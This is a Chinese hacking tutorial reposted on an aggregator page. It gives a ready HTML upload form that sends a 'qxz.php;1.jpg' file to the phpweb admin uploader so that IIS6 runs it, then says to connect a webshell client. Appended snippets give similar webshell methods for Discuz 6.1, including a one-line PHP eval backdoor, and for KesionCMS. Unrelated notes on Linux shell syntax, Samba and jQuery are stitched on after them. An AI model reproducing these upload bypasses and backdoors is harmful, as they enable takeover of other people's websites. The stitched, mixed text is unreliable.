关于phpweb后台拿shell简单方法。

首先登录后台admin.php

登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。

代码文件如下:

<form name=”uploadForm” method=”post”
enctype=”multipart/form-data”
action=”http://www.xxx.com/kedit/upload_cgi/upload.php”> 
<input
type=”text” name=”fileName” value=”qxz.php;1.jpg”
/> 
<input type=”hidden” name=”attachPath”
value=”news/pics/” /> 
<input type=”file”
name=”fileData” size=”14″ /></td> 
<input
type=”submit” name=”button” value=”确定”
/> 
</form>

然后选择你的马儿再上传

上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。

菜刀链接看下

PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg

代码文件下载地址:http://pan.baidu.com/s/1eRzHs

原创文章转载请注明:转载自七行者博客

本文固定链接: http://www.qxzxp.com/4117.html

关于phpweb后台拿shell简单方法。,码迷,mamicode.com

时间: 2024-08-11 09:51:52

关于phpweb后台拿shell简单方法。的相关文章

discuz6.1两种方法后台拿shell

discuz6.1两种方法后台拿shell好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下1:http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yesadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell<?php eval($_POST[cmd]);?>后台webshell地址

shell实现四则运算简单方法

在刚刚学习写shell 批处理时候,进行逻辑运算中,少不了需要进行基础的:四则运算,这里说说在linux shell 里面简单的实现方法.1.简单方法$ b=$((5*5+5-3/2)) $ echo $b29 在linux shell中,我们可以使用 $(()) 将表达式放在括号中,即可达到运算的功能.2.其它方法:用:expr 实现运算$ expr 5 - 41 注意:将需要运算的表达式写入在expr 后面即可,保证 参数与运算符号中间有空格隔开. 类别 语法 说明 条件判断 expr1 \

KesionCMS V6.5后台拿SHELL方法

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来. 1. 新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的. 2. 后台SQL执行导出webshell 理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的.但是TXT文

Linux shell ${}简单用法

转自:Linux shell ${}简单用法 为了完整起见,我这里再用一些例子加以说明 ${ } 的一些特异功能:假设我们定义了一个变量为:file=/dir1/dir2/dir3/my.file.txt我们可以用 ${ } 分别替换获得不同的值:${file#*/}:拿掉第一条 / 及其左边的字符串:dir1/dir2/dir3/my.file.txt${file##*/}:拿掉最后一条 / 及其左边的字符串:my.file.txt${file#*.}:拿掉第一个 . 及其左边的字符串:fil

(原创)Linux跟Window共享文件的两个简单方法

第一中种方法: Linux中启动shell,输入如下命令: mount -t cifs -o username="my-pc-name",password="my-password" //my-ip-addr/sharefolder /mnt/my-linux-sharefolder 回车,ok. 第二种方法: 1. linux的/etc/smb.conf备份,然后touch smb.conf一个新文件. 2. vi smb.conf如下: [global] wor

一种异构数据库同步的简单方法

标题有点高大上,是为了解决实际应用中的一个问题.做了一个Android应用,用于记录日常消费账单,开始是单机版的,我老婆说太low了,起码要能看到彼此的消费情况吧.为此,我还专门写了一套基于protobuf的RPC组件,用于网络通信,http://www.cnblogs.com/zmkeil/p/5176758.html. 应用本身比较简单,几张简单粗暴的UI,涵盖了增.删.改各种功能,外加一个后台service组件,用于上传账单,并同步他人账单.也算是麻雀虽小五脏俱全吧,看几张效果图.代码见h

Discuz! X2.5 添加自定义数据调用模块(简单方法)

转:http://521-wf.com/archives/46.html Discuz! X2.5 添加自定义数据调用模块(简单方法) Discuz!X系列的diy功能还是相当不错的,在对其进行二次开发的过程中,或许需要加入新的数据调用模块,这样可以使你开发的功能模块也像原来的模块一样,只需要点点鼠标,填写一些简单的信息,就可以在各个页面的各个位置显示你想显示的数据啦. 以下就目前最新版X2.5做一个简答的介绍:大致可以分为以下三个步骤:一.添加数据调用程序二.后台更新diy模块分类缓存三.添加

ASP.net中导出Excel的简单方法介绍

下面介绍一种ASP.net中导出Excel的简单方法 先上代码:前台代码如下(这是自己项目里面写的一点代码先贴出来吧) <div id="export" runat="server" style="width: 700px; margin-left: auto; margin-right: auto;"> <!--startprint--> <table width="100%" border=&

Jquery中表单提交的简单方法--serilize()方法

html代码 <form id="form1" action="#"> <input id="username" type="text" name="username" /> <input id="content" type="text" name="content" /> <input id="